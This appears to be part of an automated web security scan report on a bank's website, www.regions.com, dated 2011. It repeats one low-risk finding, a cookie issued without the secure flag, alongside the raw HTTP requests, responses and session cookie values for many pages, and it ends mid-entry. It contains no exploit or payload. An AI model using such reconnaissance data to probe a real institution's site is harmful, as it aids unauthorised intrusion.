GET /App_Themes/Default/screen.css HTTP/1.1 Host: www.regions.com Connection: keep-alive Referer: https://www.regions.com/personal_banking.rf Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: www.regions.com-http=R1402660298; www.regions.com-ssl=R1752032910; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Contact.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/contact.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 150
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/contact.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /FAQ/insured_deposits.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/faq/insured_deposits.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 163
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/faq/insured_deposits.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /GoogleSearch.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 200 OK Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:36 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 20239
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><titl ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Locator.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 200 OK Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 18903
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><titl ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Rates.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 200 OK Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:32 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 18775
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><titl ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /about_regions.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 200 OK Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 23754
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><titl ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /about_regions/economic_update.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/about_regions/economic_update.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 172
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/about_regions/economic_update.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /commercial_banking.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 200 OK Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 24850
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><titl ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /favicon.ico HTTP/1.1 Host: www.regions.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-ssl=R1752032910
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /img/btnDownArrow.gif HTTP/1.1 Host: www.regions.com Connection: keep-alive Referer: https://www.regions.com/personal_banking.rf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /img/btnRightArrow.gif HTTP/1.1 Host: www.regions.com Connection: keep-alive Referer: https://www.regions.com/personal_banking.rf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /img/left.gif HTTP/1.1 Host: www.regions.com Connection: keep-alive Referer: https://www.regions.com/personal_banking.rf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910
Response
HTTP/1.1 200 OK Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Content-Length: 43 Content-Type: image/gif Last-Modified: Thu, 02 Oct 2008 15:28:14 GMT Accept-Ranges: bytes ETag: "0fb457ca324c91:7c0f" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 15:49:19 GMT
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /img/logoRegions_213x45.gif HTTP/1.1 Host: www.regions.com Connection: keep-alive Referer: https://www.regions.com/personal_banking.rf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910
Response
HTTP/1.1 200 OK Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Content-Length: 6788 Content-Type: image/gif Last-Modified: Tue, 26 May 2009 17:12:46 GMT Accept-Ranges: bytes ETag: "03b2a3025dec91:7c0f" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 15:49:19 GMT
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /js/loadMedia.js HTTP/1.1 Host: www.regions.com Connection: keep-alive Referer: https://www.regions.com/personal_banking.rf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: www.regions.com-http=R1402660298; www.regions.com-ssl=R1752032910; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55
Response
HTTP/1.1 200 OK Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Content-Type: application/x-javascript Last-Modified: Thu, 18 Mar 2010 14:18:12 GMT Accept-Ranges: bytes ETag: "0aa72d7a5c6ca1:7c0f" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 15:49:15 GMT Content-Length: 18069
...// (1) browser vendor: // is_nav, is_firefox, is_ie, is_opera, is_hotjava, is_webtv, is_TVNavigator, is_AOLTV // (2) browser version number: // is_major (integer indicating major version ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /js/wtbase.js HTTP/1.1 Host: www.regions.com Connection: keep-alive Referer: https://www.regions.com/personal_banking.rf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910
Response
HTTP/1.1 200 OK Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Content-Type: application/x-javascript Last-Modified: Thu, 06 Nov 2008 18:55:36 GMT Accept-Ranges: bytes ETag: "0c4bd404140c91:7c0f" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 15:49:17 GMT Content-Length: 13718
function DcsInit(){ this.dcsid="dcs4b71fc10000gs8u88h5t1k_6n2i"; this.domain="statse.webtrendslive.com"; this.enabled=true; this.exre=(function(){ if (window.RegExp){ return(new RegExp( ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mortgage.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 200 OK Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 23526
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><titl ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_banking/alternative_education_loans.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/personal_banking/alternative_education_loans.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 187
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/personal_banking/alternative_education_loans.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_banking/auto_loans.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/personal_banking/auto_loans.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 170
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/personal_banking/auto_loans.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_banking/cds.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/personal_banking/cds.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 163
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/personal_banking/cds.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_banking/checking.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/personal_banking/checking.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 168
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/personal_banking/checking.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_banking/credit_cards.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/personal_banking/credit_cards.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 172
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/personal_banking/credit_cards.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_banking/ehl.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/personal_banking/ehl.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 163
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/personal_banking/ehl.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_banking/email_starting_net.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/personal_banking/email_starting_net.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 178
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/personal_banking/email_starting_net.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_banking/everyday_banking.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/personal_banking/everyday_banking.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 176
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/personal_banking/everyday_banking.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_banking/get_started_online_statements.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/personal_banking/get_started_online_statements.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 189
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/personal_banking/get_started_online_statements.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_banking/home_equity_main.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/personal_banking/home_equity_main.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 176
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/personal_banking/home_equity_main.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
